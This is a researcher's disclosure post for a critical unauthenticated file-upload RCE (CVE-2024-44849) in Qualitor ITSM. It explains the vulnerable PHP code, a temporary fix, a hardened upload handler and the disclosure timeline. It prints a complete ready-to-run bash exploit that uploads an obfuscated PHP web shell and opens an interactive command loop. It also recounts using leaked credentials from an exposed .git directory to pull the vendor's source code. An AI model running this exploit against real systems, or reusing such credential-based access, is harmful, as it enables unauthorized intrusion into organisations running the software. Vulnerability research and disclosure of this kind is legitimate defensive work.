CVE-2024-44849 - Unauthenticated RCE through Unrestricted File Upload
CVE-2024-44849 - CRITICAL Unauthenticated RCE through Unrestricted File Upload (<= Qualitor 8.24)
Before we move on to the technical details, it is important to understand what a CVE is. I have written a brief summary in the text below, in case you would like to know a little more.
Qualitor is ITSM software sold in the B2B (business-to-business) model: other companies purchase a "Qualitor ITSM" license from the company "Qualitor Software e Servicos de Informatica S/A".
Qualitor ITSM has a large market share in Rio Grande do Sul, the 6th largest state in Brazil. It is normally hosted on-premises, and deployment can be done by the Qualitor team for a small service fee.
Some time ago, while creating new dorks to use in bug bounty programs, I found an exposed web server with directory listing enabled:
By browsing this server, it was possible to identify an exposed .git directory:
Exploring the exposed directory, I identified cleartext credentials that could be used to gain access to the Qualitor ITSM source code:
Using the same exposed URL with credentials, it was possible to obtain access to the Qualitor ITSM source code:
Since this is an ITSM, users are expected to attach files to tickets, so I looked for a PHP file implementing file upload. When I found one, I compared it with another, arbitrarily chosen Qualitor file and saw that the upload script had no access control mechanism at all:
Having established the absence of access control, I found that the upload routine itself was also unrestricted: it performed no validation of the file's type, extension or content:
This lets an unauthenticated attacker upload any file type to the server. Without such checks, an attacker can upload malicious files (such as PHP scripts or executables) that are later executed or otherwise abused, leading to unauthorized access, privilege escalation or code execution.
Now, let's see how this vulnerability arises in more technical details:
Line 12: $tempFile = $_FILES['fleArquivo']['tmp_name'];
This line stores the temporary path of the uploaded file. At this point, no validation is performed to check the type, content, or integrity of the file, making it the first point where improper handling begins.
Line 113: $storeFolder = $_REQUEST['nmdiretoriorede']."/" . $_FILES['fleArquivo']['name'];
Here the destination path is built directly from user-controlled input: $_REQUEST['nmdiretoriorede'] (which PHP accepts from GET, POST or cookie) chooses the directory, and the client's original file name, unsanitised, becomes the file name. The attacker therefore decides both where the file is written and what it is called, which allows directory traversal and overwriting of existing files. In the exploit below, nmdiretoriorede is set to "." so the file lands in the web-served request directory, next to checkAcesso.php.
Line 115: $retorno = move_uploaded_file($tempFile, $storeFolder);
This function moves the file from its temporary location to the final destination on the server. Since nothing was validated beforehand, a file of any type, including a .php script that the web server will happily execute, is written to the attacker-chosen location.
To demonstrate the impact of this vulnerability in practice, I developed an exploit that abuses it automatically and gives a command shell on any host running Qualitor, without any kind of authentication:
#!/bin/bash
# Author: Extencil <extencil@extencil.me>
# Date: September, 2024.
#
# CVE-2024-44849 Unauthenticated Remote Code Execution Exploit
echo "
Qualitor Web <= 8.24 RCE Exploit v1.0 (CVE-2024-44849)
By Extencil <extencil@extencil.me>, September 2024.
Using this program to attack or compromise any company or system without mutual consent is illegal. The author of this code does not take any responsibility for any misuse or illegal activities conducted using this software. It is intended for educational purposes and authorized testing only. Always ensure you have proper authorization before conducting any security assessments.
"
if [ $# -lt 1 ]; then
echo "
Usage:
$0 <url>
$0 https://csc.extencil.me/html/ad/adfilestorage/request/checkAcesso.php
"
exit 1
fi
URL="$1"
echo "[*] Exploiting the target.."
# Random 16-character file name; the .php extension is accepted as-is because the handler validates nothing
FILENAME=$(< /dev/urandom tr -dc 'a-z0-9' | head -c 16)".php"
# The Hackers Choice <thc.org> smallest PHP backdoor: decodes to if(isset($_POST[0])){system($_POST[0]);die;}
MALICIOUS_CODE='<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>'
# nmdiretoriorede="." (below) makes move_uploaded_file() write into the request directory itself,
# so the backdoor ends up at the same URL path as checkAcesso.php
BACKDOOR_URL=$(echo "$URL" | sed 's/checkAcesso.php$//')"$FILENAME"
# Boundary for multipart/form-data
BOUNDARY="---------------------------QUALITORspaceCVEspace2024space44849"
# Create the POST request with curl using inline file content.
# Each part is: header line, blank line, value (empty for the unused fields).
echo "[*] Sending the backdoor.."
curl -X POST "$URL" -s --insecure \
-H "Cookie: XDEBUG_SESSION=ECLIPSE_DBGP; XDEBUG_SESSION=ECLIPSE_DBGP; B_protocol=https%3A; XDEBUG_SESSION=ECLIPSE_DBGP; SOLICITANTE=false; _LOGIN_SOLICITANTE_=padrao; ATENDENTE=false; session820=" \
-H "Content-Type: multipart/form-data; boundary=$BOUNDARY" \
--data-binary "--$BOUNDARY
Content-Disposition: form-data; name=\"idtipo\"

2
--$BOUNDARY
Content-Disposition: form-data; name=\"nmfilestorage\"

--$BOUNDARY
Content-Disposition: form-data; name=\"nmdiretoriorede\"

.
--$BOUNDARY
Content-Disposition: form-data; name=\"nmbucket\"

--$BOUNDARY
Content-Disposition: form-data; name=\"nmaccesskey\"

--$BOUNDARY
Content-Disposition: form-data; name=\"nmkeyid\"

--$BOUNDARY
Content-Disposition: form-data; name=\"fleArquivo\"; filename=\"$FILENAME\"

$MALICIOUS_CODE
--$BOUNDARY
Content-Disposition: form-data; name=\"cdfilestorage\"

--$BOUNDARY--"
echo
echo
echo "[*] Target is vulnerable if the response contains 'Upload realizado com sucesso'."
echo
# Interactive loop: every command is sent URL-encoded in POST field 0 and run by the backdoor via system()
while true; do
read -r -p "(backdoor@qualitor): $ " BackdoorCommand
if [[ "$BackdoorCommand" == "exit" ]]; then
echo "Exiting..."
break
fi
curl -s --insecure "$BACKDOOR_URL" --data-urlencode "0=$BackdoorCommand"
done
Also available on GitHub: https://github.com/extencil/CVE-2024-44849
As of this moment, I have not received a formal response from the Qualitor team to mitigate this vulnerability.
However, you can TEMPORARILY mitigate this vulnerability by adding the line below to the checkAcesso.php file:
include("../../../../autentica.php");
Before (without fix) ❌❌❌:
After (with fix) ✅✅✅:
The line above includes Qualitor's native access control component, which only checks that the user is authenticated. Any authenticated user, including a regular user without admin permissions, can therefore still exploit this vulnerability.
This is not and should not be considered a definitive fix, but it is the most I can do to help protect your infrastructure until there is a formal response from the Qualitor team.
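For comparison, a fuller hardening of the upload handler is shown below. This is an added example written for this page, not Qualitor's code and not the author's patch. It keeps the autentica.php include from the temporary fix and then removes every attacker-controlled element from the three vulnerable lines discussed above: the destination directory becomes a fixed server-side path, the client's file name is used only to derive an extension that is checked against an allowlist, the content is sniffed with libmagic, and the stored name is generated randomly. The field name fleArquivo and the autentica.php path come from the post; the storage directory, size limit, allowlist and the assumption that autentica.php terminates the request for unauthenticated users are the example's own.

```php
<?php
// Added example: hardened replacement for the upload path described in the post.
// Not Qualitor's code. fleArquivo and autentica.php come from the post; the
// storage path, limits and allowlist below are assumptions for illustration.
declare(strict_types=1);

// (1) Authentication first: the post's temporary fix. autentica.php is assumed
//     to end the request for unauthenticated users.
require_once __DIR__ . '/../../../../autentica.php';

// (2) Destination directory is fixed server-side and (by assumption) not served
//     by the web server, so $_REQUEST['nmdiretoriorede'] no longer steers the write.
const UPLOAD_DIR = '/var/lib/qualitor/uploads';   // assumed path, outside the web root
const MAX_BYTES  = 20 * 1024 * 1024;

// (3) Extension allowlist, each mapped to the libmagic MIME types accepted for it.
const ALLOWED = [
    'pdf'  => ['application/pdf'],
    'png'  => ['image/png'],
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'txt'  => ['text/plain'],
    'zip'  => ['application/zip'],
];

function fail(int $status, string $msg): void
{
    http_response_code($status);
    header('Content-Type: text/plain; charset=utf-8');
    echo $msg;
    exit;
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    fail(405, 'POST required');
}
if (!isset($_FILES['fleArquivo']) || !is_array($_FILES['fleArquivo'])) {
    fail(400, 'Missing file field fleArquivo');
}
$file = $_FILES['fleArquivo'];
if ($file['error'] !== UPLOAD_ERR_OK) {
    fail(400, 'Upload failed with PHP error code ' . $file['error']);
}
if ($file['size'] > MAX_BYTES) {
    fail(413, 'File too large');
}
// Reject anything that did not arrive through PHP's HTTP upload mechanism.
if (!is_uploaded_file($file['tmp_name'])) {
    fail(400, 'Not an uploaded file');
}

// The client-supplied name is used only to derive an extension for the allowlist
// check. It is never used to build a path, so traversal and overwrite are gone.
$originalName = basename($file['name']);
$ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
if (!array_key_exists($ext, ALLOWED)) {
    fail(415, 'File type not allowed');
}

// Content check from magic bytes, not from the client's Content-Type header.
// A PHP web shell renamed to .txt is reported by libmagic as text/x-php and rejected.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
if ($mime === false || !in_array($mime, ALLOWED[$ext], true)) {
    fail(415, 'File content does not match its extension');
}

// Server-generated name: random, unpredictable, carrying only the validated extension.
$storedName = bin2hex(random_bytes(16)) . '.' . $ext;
$dest = UPLOAD_DIR . '/' . $storedName;

if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
    fail(500, 'Storage directory unavailable');
}
if (!move_uploaded_file($file['tmp_name'], $dest)) {
    fail(500, 'Could not store file');
}
chmod($dest, 0640);   // readable by the application, never executable

// Return the server-side handle. Linking it to the ticket and keeping the display
// name is left to the calling code (assumed to exist elsewhere in the application).
header('Content-Type: application/json');
echo json_encode([
    'ok'   => true,
    'id'   => $storedName,
    'name' => $originalName,
    'size' => $file['size'],
]);
```

Two caveats for anyone adapting this. If the files must stay under the web root, the directory also needs script execution disabled at the web-server level (for Apache, for example, `php_admin_flag engine off` in the directory's configuration), because the allowlist and MIME check are defence in depth, not a guarantee. And the original nmdiretoriorede parameter is simply ignored here; if the application genuinely needs per-tenant or per-storage directories, map a validated identifier to a server-side path rather than accepting a path from the request.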
This vulnerability was not cataloged by MITRE at the time I identified it. I identified it in June 2024 and immediately reported it to the company through several channels:
LinkedIn: I contacted the IT and Infrastructure coordinators, no response.
WhatsApp: I contacted the support team via Qualitor's corporate number, no response (they only answer on WhatsApp for their customers).
E-mail: I sent e-mails to the contact addresses registered in Registro.BR's national whois database, but also received no response.
Timeline in format MM-DD-YYYY (month, day, year):
06-03-2024 - Vulnerability found
06-05-2024 - Vulnerability reported via e-mail to the domain contact
06-17-2024 - Vulnerability reported via LinkedIn
06-24-2024 - Vulnerability reported via WhatsApp (number found on their website)
07-01-2024 - Vulnerability reported via e-mail again
(Since there was no response from Qualitor, the vulnerability was reported to the MITRE Corporation.)
08-18-2024 - Vulnerability reported to the MITRE Corporation via the CVE form
09-06-2024 - Vulnerability accepted by the MITRE Corporation (private disclosure)
09-09-2024 - Vulnerability published by the MITRE Corporation (public disclosure)
I would like to thank my friends for their suggestions for registering this CVE.
Musa Attalah from NAVA;
Messede from The Hackers Choice;
Skyper from The Hackers Choice;
Clonazepunk from The Hackers Choice.